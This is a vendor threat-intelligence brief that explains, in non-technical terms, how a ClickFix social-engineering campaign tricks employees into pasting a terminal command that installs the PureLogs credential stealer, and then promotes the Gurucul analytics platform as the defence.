The Reveal Platform
Intel Name: Canndelta clickfix campaign abusing donut shellcode to deploy purelogs stealer
Date of Scan: June 3, 2026
Impact: High
Summary: Corporate security leaders continuously face aggressive social engineering operations that bypass modern perimeter controls. The Canndelta ClickFix Campaign highlights how modern threat groups modify their distribution systems to drop dangerous data collection software onto endpoint devices. This strategic threat exploits routine daily employee activities to bypass standard file filters and break into the protected corporate environment. Modern attackers know that business professionals regularly access web conferencing portals and collaborate across multiple cloud workspaces. By weaponizing these background routines, adversaries execute unauthorized installer commands without drawing immediate notice from traditional detection tools. This precise clickfix campaign setup represents a major evolution in corporate social engineering.
The threat actors behind this operation appear focused on credential theft, financial fraud, and maintaining access to compromised environments. Unlike classic ransomware groups that cause immediate operational shutdowns by locking local hard drives, these adversaries choose a stealthy strategy. Their primary goal involves the quiet deployment of a highly flexible data harvester known as a data stealer module. Once inside your enterprise environment, this software works silently behind the scenes to capture master passwords, financial credentials, and active cloud session tokens. This sustained access lets attackers study company operations before executing deeper financial or administrative fraud.
The overall business impact of letting an unmonitored information harvester stay inside your enterprise infrastructure is immense. When bad actors compromise corporate workstations, your overall compliance and risk posture degrades immediately. This hidden presence can lead to regulatory fines, significant litigation costs, and the loss of protected business secrets. Furthermore, stolen browser cookies let attackers impersonate senior executives to authorize fraudulent wire transfers or manipulate supply chain files. For a Chief Information Security Officer, this shifting threat matrix requires moving past static firewalls toward continuous internal behavioral monitoring.
To build a reliable corporate defense, enterprise leaders must evaluate how this modular delivery method operates. The attack chain usually begins when a worker encounters a realistic notification or a fake browser error message. This text tells them that a vital system component or a required document display font failed to load properly. To resolve this technical issue, the deceptive webpage displays clear instructions that guide the employee into compromising their own machine.
The user clicks a button that copies a hidden command sequence directly into their local clipboard. The instructions then tell the worker to open their native command terminal and paste the string into the prompt console. This deceptive delivery method can be easily understood through an analogy involving an unauthorized facility maintenance vendor. Imagine an office manager who receives a realistic looking work order from an external building authority. A deceptive actor intercepts the standard forms and replaces them with a custom package containing modified instructions. The manager follows the text because they expect a routine facility review to happen that day, letting the hidden tracking components past the barriers.
Once the worker pastes the command into the console, the terminal executes an encoded script that starts a quiet download routine. Instead of placing a single massive piece of obvious malware on the hard drive, the package deploys tiny code loaders. These small commands abuse legitimate operating system configuration tools to execute actions without triggering static security alerts. By using built-in administrative tools, the attack avoids creating suspicious file variations that old antivirus programs typically flag.
The code then assembles and executes key components in memory, reducing its reliance on files stored on disk. This process reduces visibility for security tools that primarily rely on file-based detection methods. The software also features automated defense evasion routines that inspect the local system environment before initiating data capture. If the code notes any signs of a virtual sandbox or an analysis box, it pauses its actions or acts completely normal. Once it confirms it is running in a legitimate user environment, it may establish persistence through operating system mechanisms that allow execution after reboot.
Organizations must update their protective posture by using continuous behavioral surveillance to counter advanced desktop based threats. Traditional security measures struggle against web based script redirection because the initial download action is done willingly by the user. Because the endpoint runs native administrative programs to initiate the file setup, standard rule parameters stay quiet. Security operations groups must use advanced analytics tools that can evaluate the context of system behavior in real time. This capability allows the system to notice when a standard application begins performing highly anomalous infrastructure tasks.
Defending an enterprise from stealthy data stealers requires an integrated security structure that includes identity threat detection and response at every organizational layer. Once a data harvester gains a foothold on a server, its main objective is to harvest administrative cloud credentials. If your security team depends only on basic single point password checks, they will miss the early indicators of a compromised automation identity. Organizations must analyze verification logs alongside server telemetry to spot credential misuse. This approach ensures that if an attacker attempts to use copied access keys from an unverified location, the platform cuts access immediately.
Eradicating a highly evasive clickfix campaign requires a complete shift away from legacy security models. This is precisely where the Gurucul Security Analytics Platform helps organizations transform their defensive operations. Instead of searching for specific known file definitions or static indicators of compromise, Gurucul tracks user and entity behavior analytics. By creating an accurate operational baseline for every single identity and system on the corporate network, the platform immediately flags the minor anomalies that happen during an intrusion.
The Gurucul Security Analytics Platform evaluates data across all computing fields, including identity stores, endpoint tools, and cloud infrastructure. When a modified script package tries to alter configuration parameters or harvest system memory sections, Gurucul catches the anomalous sequence. The platform connects these minor odd indicators across multiple phases, raising a risk score before data exfiltration can take place. This fast automated context ensures your security operations center can isolate the affected system during the initial step of the attack.
This modern analytics framework removes the blind spots that old security platforms face when dealing with fileless intrusions. Because Gurucul reviews the contextual intent of system behavior rather than the specific code layout, the layout of the package does not matter. The platform tracks the behavioral footprint of the attack, such as unexpected administrative command execution or unusual outbound data transfers. This deep visibility allows analysts to stop the campaign before the adversary can compromise sensitive enterprise credentials.
To see the complete technical breakdown of the multi-stage delivery architecture and explore the indicator maps for this threat, read the full research report on our community.
